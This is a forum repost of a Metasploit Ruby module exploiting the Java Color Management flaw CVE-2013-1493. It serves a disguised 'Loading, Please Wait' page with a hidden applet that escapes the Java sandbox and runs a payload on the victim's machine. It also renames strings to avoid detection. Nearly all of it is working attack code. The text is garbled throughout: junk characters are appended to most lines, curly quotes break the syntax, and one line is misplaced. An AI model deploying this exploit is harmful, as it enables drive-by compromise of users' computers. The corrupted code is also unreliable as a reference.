##
: c* D8 S( W4 P2 G" q" v3 ?8 D8 A. }+ Q% q
# This file is part of the Metasploit Framework and may be subject to7 T; l1 L8 F4 I: X1 L i' r
# redistribution and commercial restrictions. Please see the Metasploit3 y( t& B6 r5 d4 U4 j
# web site for more information on licensing and terms of use.: f0 i" u) D8 G
# http://metasploit.com/ F7 J4 t6 _" j7 `8 Z
##
) Q1 j5 X5 T$ r! y$ }3 drequire ‘msf/core’
0 T8 W$ M/ f W0 w# Grequire ‘rex’
4 W- f. C9 U8 B" |% _9 f9 p" kclass Metasploit3 < Msf::Exploit::Remote
# \6 i$ r6 {# p% [: gRank = NormalRanking; I, c$ B: S; Y' u
include Msf::Exploit::Remote::HttpServer::HTML( ?, N+ A* @5 f. K* q5 C; P3 k. v
include Msf::Exploit::EXE
7 H9 z9 u1 v" e$ g5 dinclude Msf::Exploit::Remote::BrowserAutopwn1 j! H9 c0 |& U* } U+ o! V
autopwn_info({ :javascript => false })" B% _. l9 l' z! ?( w/ {
def initialize( info = {} )
- O! A3 D* s. Q6 p& I7 r6 k* ]super( update_info( info,
- Q/ ~8 }$ x3 C‘Name’ => ‘Java CMM Remote Code Execution’,6 Z4 L( ^4 t/ V/ ^/ l
‘Description’ => %q{
5 i. v) W$ p! c6 n5 V! C2 c7 Q- YThis module abuses the Color Management classes from a Java Applet to run
$ J' v) m4 F" S% w+ q( j7 K% c+ N3 Carbitrary Java code outside of the sandbox as exploited in the wild in February
8 B9 _8 Z1 A& e d9 ~& C1 ^) Sand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
( p N0 b# s' o; I4 V6 [and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
( f* A" w' l2 Vsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
b; I9 t1 ?; e; B. S4 bwarning in order to run the malicious applet.
! E; \$ q( T- P& C3 o},8 z- v! Q, ^7 R* {, \: K
‘License’ => MSF_LICENSE,
' t5 ^) p3 }# B% X( n‘Author’ =>1 @8 E9 g5 W L' f, j
'Unknown', # Vulnerability discovery and Exploit
3 ]! @: O$ H/ q& T- U9 B: f" b'juan vazquez' # Metasploit module (just ported the published exploit)
+ j3 M& K" i. C# s" d& d],/ S0 a* l, ]" G+ l/ ]/ h
‘References’ =>1 v/ s4 U& C/ s' l4 k
[
# C: h; }* s# @4 m. p[ 'CVE', '2013-1493' ],
/ _9 u1 \3 U8 \/ N8 U* \& c1 }) n[ 'OSVDB', '90737' ],
- ~" o) H$ i. a+ l& h( }[ 'BID', '58238' ],
1 S; Y, V1 `" x- _0 p[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
' s2 h8 U7 f% v& s2 |1 O[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
I/ c4 h4 J: }" ][ 'URL', 'http://pastie.org/pastes/6581034' ]
; [. s @: \; \) S$ V- u5 i],, M4 v! Q7 |( z6 O) a
‘Platform’ => [ 'win', 'java' ],
& j3 F# o& c7 D" o; S* ?4 q7 D‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },8 K9 u, W0 b1 x( p5 c' A! n
‘Targets’ =>
4 _9 e$ O/ j/ v6 G0 y- O0 `[
9 s% k9 `& z) z9 ~, l3 _[ 'Generic (Java Payload)',
- `! f' u& W9 U4 S3 S% |{- e+ @. B, e; z3 D
'Platform' => 'java',
2 v3 d( C+ k3 h7 ?' s, @' \; [7 i'Arch' => ARCH_JAVA6 G$ J3 ?$ M0 S5 s, a7 u9 H; s
}" R G( x2 Y% b5 q5 H' ]4 R
],
! d0 y/ F) y+ _% @$ d9 b) p! r" h$ c0 I[ 'Windows x86 (Native Payload)',9 M" \2 p1 _: F% v
{
3 ?5 x5 N" K. L, D: W'Platform' => 'win',+ S3 F }0 {# b- ?9 D8 o, u2 X
'Arch' => ARCH_X863 t! L3 a: E0 U" a& q5 u0 I2 c) d
}
6 d8 ]# R2 x; n) E" n]
* l) T5 b2 N0 }( a& B6 n4 c; }: ^],
( E, A7 i! }; l! U* S. _" X‘‘DisclosureDate’ => ‘Mar 01 2013′
- E' u& b5 P( I7 L+ r, F# e* \))
+ b7 d& p4 R ]3 f F7 Yend
) I" D' t2 L! z" a8 o9 wdef setup
$ I- Y1 p6 }9 _4 v O9 S0 ` C" _path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)! L0 |! t7 m% \' S
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ F+ M7 w* I+ Ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”); M; A; e* _, j, p
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ c: `/ g8 [/ N' I: ipath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
' G4 t( h+ l* F9 \3 w: r2 D$ p@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }8 k: @" S3 A; k2 m* J
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)1 U0 ^/ f2 U; T7 W4 l9 v. R0 l7 y
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
7 H& n# k* ?3 X- r! N0 b@init_class_name = rand_text_alpha(“Init”.length)
+ V; s$ ?0 `. ]5 w# [@init_class.gsub!(“Init”, @init_class_name)+ Y Z8 |' g) d: v$ P( F1 |
super
/ o. [( w8 s6 l$ @* Eend; f% ?5 n. @& ~% q) @
def on_request_uri(cli, request)1 Z, p" V2 X! t* j: J/ V, h- @
print_status(“handling request for #{request.uri}”)3 ^6 Q' c; T4 u& E9 z; r9 Y( H
case request.uri
8 C( @& F9 n) j, j' Wwhen /\.jar$/i$ C8 s% q) p+ U% c9 D* f7 s, H
jar = payload.encoded_jar2 K1 K) W, t" m, P/ o% e2 Z
jar.add_file(“#{@init_class_name}.class”, @init_class)0 ` v5 [; l0 e% {- y/ }" ]( F
jar.add_file(“Leak.class”, @leak_class)1 _/ h8 o/ T2 h% a/ E! K$ \6 A
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
7 D5 [* Z: p1 A( Q( u. fjar.add_file(“MyColorSpace.class”, @color_space_class)& Z h& @, i3 P) N- f2 j
DefaultTarget’ => 1,, h' t8 k( H, \9 J {
metasploit_str = rand_text_alpha(“metasploit”.length)
# L- P9 [5 @) D- y( B9 X) Q, \6 Wpayload_str = rand_text_alpha(“payload”.length)
Y" B; Z( w- R( t: i sjar.entries.each { |entry|
3 ` N4 o) p4 Centry.name.gsub!(“metasploit”, metasploit_str)0 a8 K+ @0 n# }2 S- g* i, V
entry.name.gsub!(“Payload”, payload_str)( P5 A; U% y4 J
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
3 G! f# E* B4 G+ \) W/ \! @entry.data = entry.data.gsub(“Payload”, payload_str). r! p" [' Y) f
}
r9 a+ w8 c' ~7 z/ [* ujar.build_manifest
$ E% l8 D0 f' \* e$ G& r- X. bsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
8 B4 C$ s5 y- G& O: x/ t6 g+ Qwhen /\/$/
1 t5 J5 `9 ^- ?payload = regenerate_payload(cli)) t4 S6 ~6 K+ A. B+ e
if not payload4 ]' N& T4 |9 V
print_error(“Failed to generate the payload.”)# E4 b3 k9 u5 g# I$ v' N2 Q- ^
send_not_found(cli)% ~. S, n3 \2 C: ]5 ]. }
return) w+ w6 W/ k* |5 w; D
end
' h* }- R" {6 @( j) bsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })' ]0 t3 m- d4 I, o$ }/ q, |; S
else
9 Y; _7 x+ B0 s- z; m5 ysend_redirect(cli, get_resource() + ‘/’, ”)
! m7 h) Q+ V" D" U1 Y3 J; p \end
4 o) I, @) d7 |+ _. u8 O9 @: zend
n! Z$ F1 V7 l: f- b% Hdef generate_html$ ] E: b. y/ A6 v- P
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
6 p2 c4 T* J0 Q: N' }) v, phtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|7 q# u% |4 m B4 h; a6 |4 V# _4 e
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
# @0 H2 L! m7 g5 W, ahtml += %Q|</applet></body></html>|
7 [- e. N+ a/ F' ?, y3 X8 m Breturn html) O# J. R* z4 h6 F2 D0 N# S; x- ]
end1 N# r* t+ f' Y5 e
end5 t, A( w, }8 z5 p% l. w# \& H* {4 Z
end
/ h9 ?' B: U- B |
发表于 2013-4-4 17:31:17
收藏
支持
反对